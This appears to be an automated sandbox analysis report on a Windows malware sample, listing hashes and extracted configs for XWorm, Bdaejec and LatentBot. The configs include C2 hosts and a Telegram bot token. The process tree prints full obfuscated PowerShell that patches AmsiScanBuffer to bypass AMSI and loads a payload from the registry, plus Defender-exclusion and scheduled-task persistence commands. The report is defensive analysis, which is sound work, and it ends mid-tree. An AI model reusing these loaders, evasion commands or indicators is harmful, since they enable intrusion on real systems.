Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/05/2025, 00:42

General

  • Target

    250519-z3llfszks4.exe

  • Size

    285KB

  • MD5

    20841606ce69632f258221219aeee09b

  • SHA1

    b72918797186774598792c47b66d5857be59f576

  • SHA256

    1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83

  • SHA512

    aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e

  • SSDEEP

    6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI

Malware Config

Extracted

Family

xworm

Version

3.1

C2

grayhatgroupontop.zapto.org:1177

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Extracted

Family

latentbot

C2

grayhatgroupontop.zapto.org

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Detects Bdaejec Backdoor. 5 IoCs

    Bdaejec is backdoor written in C++.

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Latentbot family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 20 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 44 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 8 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f4272139-aacd-4eb0-abeb-3e41dc01529c}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4caa7d59-2c60-49b6-8c4e-9ee1e261b434}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4480
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:760
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1044
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1060
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1196
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2760
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XCSObrhMeeUn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SapZSXApSQnrTi,[Parameter(Position=1)][Type]$AXluPOHCfj)$CkvqYvcfzUz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+'e'+'c'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+'yM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+'b'+'l'+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CkvqYvcfzUz.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'pec'+[Char](105)+''+'a'+'l'+[Char](78)+'a'+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$SapZSXApSQnrTi).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$CkvqYvcfzUz.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+'k'+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+'S'+[Char](105)+'g,'+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+'t'+''+'u'+''+'a'+'l',$AXluPOHCfj,$SapZSXApSQnrTi).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+'e,'+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $CkvqYvcfzUz.CreateType();}$sjdZEOUNECYEv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+'2'+''+[Char](46)+''+[Char](85)+'n'+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+'s');$THiMqbLdIIHaor=$sjdZEOUNECYEv.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YaZdFpGSsHHOGhbMcyV=XCSObrhMeeUn @([String])([IntPtr]);$suxPoEWZUqxVzFzRoNBuug=XCSObrhMeeUn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pfJAWDkfzYl=$sjdZEOUNECYEv.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+'a'+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+'.'+'dl'+[Char](108)+'')));$maqyCpVvRCihqS=$THiMqbLdIIHaor.Invoke($Null,@([Object]$pfJAWDkfzYl,[Object](''+[Char](76)+''+'o'+''+'a'+''+'d'+'Li'+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$hxXUZdrWInlLHMJfp=$THiMqbLdIIHaor.Invoke($Null,@([Object]$pfJAWDkfzYl,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l'+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$vASedcL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($maqyCpVvRCihqS,$YaZdFpGSsHHOGhbMcyV).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+'ll');$VtnUpISSTDJzQCDtN=$THiMqbLdIIHaor.Invoke($Null,@([Object]$vASedcL,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'iSca'+'n'+'B'+'u'+''+'f'+'fe'+[Char](114)+'')));$hshDbGxLox=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxXUZdrWInlLHMJfp,$suxPoEWZUqxVzFzRoNBuug).Invoke($VtnUpISSTDJzQCDtN,[uint32]8,4,[ref]$hshDbGxLox);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VtnUpISSTDJzQCDtN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxXUZdrWInlLHMJfp,$suxPoEWZUqxVzFzRoNBuug).Invoke($VtnUpISSTDJzQCDtN,[uint32]8,0x20,[ref]$hshDbGxLox);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+'E'+'').GetValue(''+'x'+''+'6'+''+[Char](57)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4828
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:936
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cFXuWiIZaHuV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$eQAPyQEdrnOwzb,[Parameter(Position=1)][Type]$guBhPbZNND)$ocobqWggrjF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oCl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ocobqWggrjF.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$eQAPyQEdrnOwzb).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+'M'+[Char](97)+'na'+[Char](103)+'e'+[Char](100)+'');$ocobqWggrjF.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+'e','Pu'+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+'wS'+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$guBhPbZNND,$eQAPyQEdrnOwzb).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ocobqWggrjF.CreateType();}$EZRJZXMFBeDOk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+'m'+[Char](46)+''+'d'+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+'2'+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+'f'+'e'+''+'N'+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$yBnboBprzjikYQ=$EZRJZXMFBeDOk.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VPGvYHGxnYzvifaRDgT=cFXuWiIZaHuV @([String])([IntPtr]);$RsnhTsiqQuHZRuAbXoZkWV=cFXuWiIZaHuV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mRPwSxwZAFc=$EZRJZXMFBeDOk.GetMethod('G'+'e'+''+[Char](116)+''+'M'+'o'+'d'+'u'+'l'+''+[Char](101)+''+[Char](72)+'a'+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'rn'+'e'+''+[Char](108)+'3'+'2'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')));$WaBoPsgGDqJkpS=$yBnboBprzjikYQ.Invoke($Null,@([Object]$mRPwSxwZAFc,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$MDnjkVAOZpiPdPyIh=$yBnboBprzjikYQ.Invoke($Null,@([Object]$mRPwSxwZAFc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$qJnGHSp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaBoPsgGDqJkpS,$VPGvYHGxnYzvifaRDgT).Invoke(''+'a'+''+'m'+'si.d'+[Char](108)+''+'l'+'');$jFoarKIuYfnXyuXWB=$yBnboBprzjikYQ.Invoke($Null,@([Object]$qJnGHSp,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+'a'+[Char](110)+'Buf'+'f'+''+[Char](101)+''+'r'+'')));$InwTbBCCVQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MDnjkVAOZpiPdPyIh,$RsnhTsiqQuHZRuAbXoZkWV).Invoke($jFoarKIuYfnXyuXWB,[uint32]8,4,[ref]$InwTbBCCVQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jFoarKIuYfnXyuXWB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MDnjkVAOZpiPdPyIh,$RsnhTsiqQuHZRuAbXoZkWV).Invoke($jFoarKIuYfnXyuXWB,[uint32]8,0x20,[ref]$InwTbBCCVQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5232
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:2624
                          • C:\Users\Admin\AppData\Roaming\x69.exe
                            C:\Users\Admin\AppData\Roaming\x69.exe
                            2⤵
                            • Executes dropped EXE
                            PID:2076
                          • C:\Users\Admin\AppData\Roaming\x69.exe
                            C:\Users\Admin\AppData\Roaming\x69.exe
                            2⤵
                            • Executes dropped EXE
                            PID:2132
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                            PID:1236
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1312
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1352
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1372
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1428
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1460
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1524
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                        1⤵
                                          PID:1552
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2496
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1616
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1684
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1732
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1796
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                    1⤵
                                                      PID:1832
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1968
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:2028
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1128
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:2108
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2148
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2188
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:2280
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2480
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2488
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2524
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                          1⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2736
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2752
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2800
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2832
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2852
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:2992
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3112
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3436
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        • Suspicious use of UnmapMainImage
                                                                                        PID:3544
                                                                                        • C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"
                                                                                          2⤵
                                                                                          • Checks computer location settings
                                                                                          • Adds Run key to start application
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:5408
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3000
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:516
                                                                                          • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:928
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2472
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:3996
                                                                                          • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                            3⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:5740
                                                                                            • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
